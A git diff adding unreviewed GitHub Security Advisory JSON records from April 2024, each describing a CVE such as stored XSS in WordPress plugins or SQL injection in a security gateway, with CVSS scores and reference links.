"severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3x3c-vqj6-m557/GHSA-3x3c-vqj6-m557.json b/advisories/unreviewed/2024/04/GHSA-3x3c-vqj6-m557/GHSA-3x3c-vqj6-m557.json new file mode 100644 index 00000000000..f505707004e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3x3c-vqj6-m557/GHSA-3x3c-vqj6-m557.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3x3c-vqj6-m557", + "modified": "2024-04-08T06:31:30Z", + "published": "2024-04-08T06:31:30Z", + "aliases": [ + "CVE-2024-1588" + ], + "details": "The SendPress Newsletters WordPress plugin through 1.23.11.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1588" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/2772c921-d977-4150-b207-ae5ba5e2a6db" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T05:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3xp5-393r-g6q2/GHSA-3xp5-393r-g6q2.json b/advisories/unreviewed/2024/04/GHSA-3xp5-393r-g6q2/GHSA-3xp5-393r-g6q2.json new file mode 100644 index 00000000000..c7cc9909205 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3xp5-393r-g6q2/GHSA-3xp5-393r-g6q2.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3xp5-393r-g6q2", + "modified": "2024-04-07T03:30:45Z", + "published": "2024-04-07T03:30:45Z", + "aliases": [ + "CVE-2023-6877" + ], + "details": "The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.3.3 due to insufficient input sanitization and output escaping on the Content-Type field of error messages when retrieving an invalid RSS feed. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6877" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3012849/feedzy-rss-feeds" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7d25e85f-28f7-4cc5-9856-25cc5aaf1418?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T02:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-443p-64xr-9cq7/GHSA-443p-64xr-9cq7.json b/advisories/unreviewed/2024/04/GHSA-443p-64xr-9cq7/GHSA-443p-64xr-9cq7.json new file mode 100644 index 00000000000..531418e18c9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-443p-64xr-9cq7/GHSA-443p-64xr-9cq7.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-443p-64xr-9cq7", + "modified": "2024-04-08T18:30:47Z", + "published": "2024-04-08T18:30:47Z", + "aliases": [ + "CVE-2024-3455" + ], + "details": "A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/add_postlogin.php. The manipulation of the argument SingleLoginId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259711.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3455" + }, + { + "type": "WEB", + "url": "https://github.com/flyyue2001/cve/blob/main/NS-ASG-sql-add_postlogin.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259711" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259711" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312182" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-44j5-2jvm-f6f7/GHSA-44j5-2jvm-f6f7.json b/advisories/unreviewed/2024/04/GHSA-44j5-2jvm-f6f7/GHSA-44j5-2jvm-f6f7.json new file mode 100644 index 00000000000..13fc25190d7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-44j5-2jvm-f6f7/GHSA-44j5-2jvm-f6f7.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-44j5-2jvm-f6f7", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2183" + ], + "details": "The Beaver Builder Addons by WPZOOM plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Heading widget in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. CVE-2024-30424 is likely a duplicate of this issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2183" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3046905/wpzoom-addons-for-beaver-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/781987af-3753-46ec-9d56-fb8b6ef42277?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-454g-4qqq-2j4g/GHSA-454g-4qqq-2j4g.json b/advisories/unreviewed/2024/04/GHSA-454g-4qqq-2j4g/GHSA-454g-4qqq-2j4g.json new file mode 100644 index 00000000000..23d3551a289 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-454g-4qqq-2j4g/GHSA-454g-4qqq-2j4g.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-454g-4qqq-2j4g", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28930" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28930" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28930" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-191" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-459v-rpwc-w8fx/GHSA-459v-rpwc-w8fx.json b/advisories/unreviewed/2024/04/GHSA-459v-rpwc-w8fx/GHSA-459v-rpwc-w8fx.json new file mode 100644 index 00000000000..b9e1277cd2c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-459v-rpwc-w8fx/GHSA-459v-rpwc-w8fx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-459v-rpwc-w8fx", + "modified": "2024-04-05T21:32:43Z", + "published": "2024-04-05T21:32:43Z", + "aliases": [ + "CVE-2024-29743" + ], + "details": "In tmu_set_temp_lut of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29743" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4677-2pjx-h9q8/GHSA-4677-2pjx-h9q8.json b/advisories/unreviewed/2024/04/GHSA-4677-2pjx-h9q8/GHSA-4677-2pjx-h9q8.json new file mode 100644 index 00000000000..6f4420de4d5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4677-2pjx-h9q8/GHSA-4677-2pjx-h9q8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4677-2pjx-h9q8", + "modified": "2024-04-09T00:30:41Z", + "published": "2024-04-09T00:30:41Z", + "aliases": [ + "CVE-2024-0082" + ], + "details": "NVIDIA ChatRTX for Windows contains a vulnerability in the UI, where an attacker can cause improper privilege management by sending open file requests to the application. A successful exploit of this vulnerability might lead to local escalation of privileges, information disclosure, and data tampering", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0082" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T22:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-47mh-5593-5c2x/GHSA-47mh-5593-5c2x.json b/advisories/unreviewed/2024/04/GHSA-47mh-5593-5c2x/GHSA-47mh-5593-5c2x.json new file mode 100644 index 00000000000..dc554eb9cfe --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-47mh-5593-5c2x/GHSA-47mh-5593-5c2x.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47mh-5593-5c2x", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-1948" + ], + "details": "The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the block content in all versions up to, and including, 2.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1948" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3055393#file4" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6cbe4748-6e87-4332-b84f-615aec67bcec?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-48g7-wj4v-xxp7/GHSA-48g7-wj4v-xxp7.json b/advisories/unreviewed/2024/04/GHSA-48g7-wj4v-xxp7/GHSA-48g7-wj4v-xxp7.json new file mode 100644 index 00000000000..e61c2dafa04 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-48g7-wj4v-xxp7/GHSA-48g7-wj4v-xxp7.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-48g7-wj4v-xxp7", + "modified": "2024-04-07T18:30:29Z", + "published": "2024-04-07T18:30:29Z", + "aliases": [ + "CVE-2024-3426" + ], + "details": "A vulnerability, which was classified as problematic, has been found in SourceCodester Online Courseware 1.0. Affected by this issue is some unknown functionality of the file editt.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259598 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3426" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-11.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259598" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259598" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311605" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-48pv-j3x3-cw7v/GHSA-48pv-j3x3-cw7v.json b/advisories/unreviewed/2024/04/GHSA-48pv-j3x3-cw7v/GHSA-48pv-j3x3-cw7v.json new file mode 100644 index 00000000000..87ab755dea9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-48pv-j3x3-cw7v/GHSA-48pv-j3x3-cw7v.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-48pv-j3x3-cw7v", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29985" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29985" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29985" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-49j4-86m8-q2jw/GHSA-49j4-86m8-q2jw.json b/advisories/unreviewed/2024/04/GHSA-49j4-86m8-q2jw/GHSA-49j4-86m8-q2jw.json new file mode 100644 index 00000000000..418bb56af29 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-49j4-86m8-q2jw/GHSA-49j4-86m8-q2jw.json @@ -0,0 +1,58 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-49j4-86m8-q2jw", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-21509" + ], + "details": "Versions of the package mysql2 before 3.9.4 are vulnerable to Prototype Poisoning due to insecure results object creation and improper user input sanitization passed through parserFn in text_parser.js and binary_parser.js.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21509" + }, + { + "type": "WEB", + "url": "https://github.com/sidorares/node-mysql2/pull/2574" + }, + { + "type": "WEB", + "url": "https://github.com/sidorares/node-mysql2/commit/4a964a3910a4b8de008696c554ab1b492e9b4691" + }, + { + "type": "WEB", + "url": "https://blog.slonser.info/posts/mysql2-attacker-configuration" + }, + { + "type": "WEB", + "url": "https://github.com/sidorares/node-mysql2/blob/fd3d117da82cc5c5fa5a3701d7b33ca77691bc61/lib/parsers/text_parser.js%23L134" + }, + { + "type": "WEB", + "url": "https://github.com/sidorares/node-mysql2/releases/tag/v3.9.4" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-MYSQL2-6591084" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1321" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-49pj-m3ff-pg2m/GHSA-49pj-m3ff-pg2m.json b/advisories/unreviewed/2024/04/GHSA-49pj-m3ff-pg2m/GHSA-49pj-m3ff-pg2m.json new file mode 100644 index 00000000000..3b45245a4a2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-49pj-m3ff-pg2m/GHSA-49pj-m3ff-pg2m.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-49pj-m3ff-pg2m", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-0872" + ], + "details": "The Watu Quiz plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.4.1 via the watu-userinfo shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to extract sensitive user meta data which can include session tokens and user emails.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0872" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3036986" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/acc261eb-fafa-4e9d-b7ab-a449f14a7638?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4cpw-m35q-r38g/GHSA-4cpw-m35q-r38g.json b/advisories/unreviewed/2024/04/GHSA-4cpw-m35q-r38g/GHSA-4cpw-m35q-r38g.json new file mode 100644 index 00000000000..3be5f7c2254 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4cpw-m35q-r38g/GHSA-4cpw-m35q-r38g.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4cpw-m35q-r38g", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-1424" + ], + "details": "The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1424" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3050712%40give%2Ftrunk&old=3046618%40give%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c1710f84-e3c1-4fbc-841e-c7c9ccf3a2e5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4crp-3vwf-rfq3/GHSA-4crp-3vwf-rfq3.json b/advisories/unreviewed/2024/04/GHSA-4crp-3vwf-rfq3/GHSA-4crp-3vwf-rfq3.json new file mode 100644 index 00000000000..8b388fa3146 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4crp-3vwf-rfq3/GHSA-4crp-3vwf-rfq3.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4crp-3vwf-rfq3", + "modified": "2024-04-08T09:31:12Z", + "published": "2024-04-08T09:31:12Z", + "aliases": [ + "CVE-2024-30662" + ], + "details": "An issue was discovered in ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, where the system transmits messages in plaintext. This flaw exposes sensitive information, making it vulnerable to man-in-the-middle (MitM) attacks, and allowing attackers to easily intercept and access this data.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30662" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30662" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4fhw-468x-g9rx/GHSA-4fhw-468x-g9rx.json b/advisories/unreviewed/2024/04/GHSA-4fhw-468x-g9rx/GHSA-4fhw-468x-g9rx.json new file mode 100644 index 00000000000..acec66d7b0b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4fhw-468x-g9rx/GHSA-4fhw-468x-g9rx.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fhw-468x-g9rx", + "modified": "2024-04-09T03:30:53Z", + "published": "2024-04-09T03:30:53Z", + "aliases": [ + "CVE-2024-30214" + ], + "details": "The application allows a high privilege attacker to append a malicious GET query parameter to Service invocations, which are reflected in the server response. Under certain circumstances, if the parameter contains a JavaScript, the script could be processed on client side.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30214" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3421453" + }, + { + "type": "WEB", + "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4fmc-4hwh-vpmr/GHSA-4fmc-4hwh-vpmr.json b/advisories/unreviewed/2024/04/GHSA-4fmc-4hwh-vpmr/GHSA-4fmc-4hwh-vpmr.json new file mode 100644 index 00000000000..422a2af4cf4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4fmc-4hwh-vpmr/GHSA-4fmc-4hwh-vpmr.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fmc-4hwh-vpmr", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-3528" + ], + "details": "A vulnerability was found in Campcodes Complete Online Student Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file units_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259898 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3528" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Student%20Management%20System/Complete%20Online%20Student%20Management%20System%20-%20vuln%201.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259898" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259898" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312519" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T01:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4fv5-487x-c795/GHSA-4fv5-487x-c795.json b/advisories/unreviewed/2024/04/GHSA-4fv5-487x-c795/GHSA-4fv5-487x-c795.json new file mode 100644 index 00000000000..039795fa143 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4fv5-487x-c795/GHSA-4fv5-487x-c795.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4fv5-487x-c795", + "modified": "2024-04-05T18:30:34Z", + "published": "2024-04-05T18:30:34Z", + "aliases": [ + "CVE-2024-0072" + ], + "details": "\nNVIDIA CUDA toolkit for all platforms contains a vulnerability in cuobjdump and nvdisasm where an attacker may cause a crash by tricking a user into reading a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0072" + }, + { + "type": "WEB", + "url": "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5517" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4g9f-cwqh-fq5v/GHSA-4g9f-cwqh-fq5v.json b/advisories/unreviewed/2024/04/GHSA-4g9f-cwqh-fq5v/GHSA-4g9f-cwqh-fq5v.json new file mode 100644 index 00000000000..cadc9e16833 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4g9f-cwqh-fq5v/GHSA-4g9f-cwqh-fq5v.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4g9f-cwqh-fq5v", + "modified": "2024-04-07T09:30:29Z", + "published": "2024-04-07T09:30:29Z", + "aliases": [ + "CVE-2023-52382" + ], + "details": "Vulnerability of improper control over foreground service notifications in the notification module.\nImpact: Successful exploitation of this vulnerability may affect service confidentiality.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52382" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4gg5-g9ph-ph8x/GHSA-4gg5-g9ph-ph8x.json b/advisories/unreviewed/2024/04/GHSA-4gg5-g9ph-ph8x/GHSA-4gg5-g9ph-ph8x.json new file mode 100644 index 00000000000..7fa7bcb458a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4gg5-g9ph-ph8x/GHSA-4gg5-g9ph-ph8x.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4gg5-g9ph-ph8x", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1465" + ], + "details": "The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘carousel_skin’ attribute of the Posts Carousel widget in all versions up to, and including, 8.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1465" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3048237/addons-for-elementor" + }, + { + "type": "WEB", + "url": 